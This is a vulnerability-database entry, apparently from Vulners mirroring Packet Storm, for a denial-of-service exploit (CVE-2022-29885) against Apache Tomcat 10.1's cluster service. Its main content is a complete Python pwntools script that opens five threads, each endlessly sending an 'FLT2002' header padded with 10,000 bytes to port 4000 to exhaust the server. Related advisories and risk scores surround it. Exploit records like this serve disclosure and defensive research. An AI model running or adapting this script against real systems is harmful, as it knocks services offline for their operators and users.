Lucene search
K

Apache Tomcat 10.1 Denial Of Service

🗓️ 06 Apr 2023 00:00:00Reported by Cristian GiustiniType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 373 Views

Apache Tomcat 10.1 Denial Of Service exploit, CVE-2022-29885, Vendor: Apache, Version <= 10.1, Tested on Docker

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Apache Tomcat 10.1 - Denial Of Service Exploit
5 Apr 202300:00
zdt
IBM Security Bulletins
Security Bulletin: IBM QRadar SIEM is vulnerable to Using Components with Known Vulnerabilities
26 Oct 202218:06
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Apache Tomcat, Apache Commons FileUpload and Apache Axis might affect IBM Storage Copy Data Management
22 Mar 202416:05
ibm
IBM Security Bulletins
Security Bulletin: IBM UrbanCode Build is vulnerable to denial of service due to use of Apache Tomcat (CVE-2022-29885).
18 Jul 202215:30
ibm
IBM Security Bulletins
Security Bulletin: IBM Sterling Control Center is affected by vulnerability in Apache Tomcat
7 Nov 202407:43
ibm
IBM Security Bulletins
Security Bulletin: IBM® Engineering Requirements Management DOORS/DWA vulnerabilities addressed in 9.7.2.8
18 Oct 202407:56
ibm
IBM Security Bulletins
Security Bulletin: IBM UrbanCode Release is vulnerable to a denial of service due to use of Apache Tomcat CVE-2022-29885
18 Jul 202215:25
ibm
IBM Security Bulletins
Security Bulletin: IBM Rational Build Forge is vulnerable to a denial of service due to use of Apache Tomcat server (CVE-2022-29885).
21 Jul 202205:17
ibm
IBM Security Bulletins
Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities including remote code execution in Apache Log4j 1.x
3 Aug 202216:43
ibm
GithubExploit
Exploit for Uncontrolled Resource Consumption in Apache Tomcat
30 Jun 202216:09
githubexploit
Rows per page
`# Exploit Title: Apache Tomcat 10.1 - Denial Of Service  
# Google Dork: N/A  
# Date: 13/07/2022  
# Exploit Author: Cristian 'void' Giustini  
# Vendor Homepage: https://tomcat.apache.org/  
# Software Link: https://tomcat.apache.org/download-10.cgi  
# Version: <= 10.1  
# Tested on: Apache Tomcat 10.0 (Docker)  
# CVE : CVE-2022-29885 (CVE Owner: 4ra1n)  
# Exploit pre-requirements: pip install pwntools==4.8.0  
# Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/   
  
  
  
  
  
#!/usr/bin/env python3  
  
# coding: utf-8  
  
from pwn import *  
  
import time  
  
import threading  
  
import subprocess  
  
threads = []  
  
  
  
  
  
def send_payload():  
  
r = remote("localhost", 4000)  
  
while True:  
  
r.send(b"FLT2002" + b"A" * 10000)  
  
  
  
for _ in range(5):  
  
new_thread = threading.Thread(target=send_payload)  
  
threads.append(new_thread)  
  
new_thread.start()  
  
for old_thread in threads:  
  
old_thread.join()  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Apr 2023 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 25
CVSS 3.17.5
EPSS0.55532
373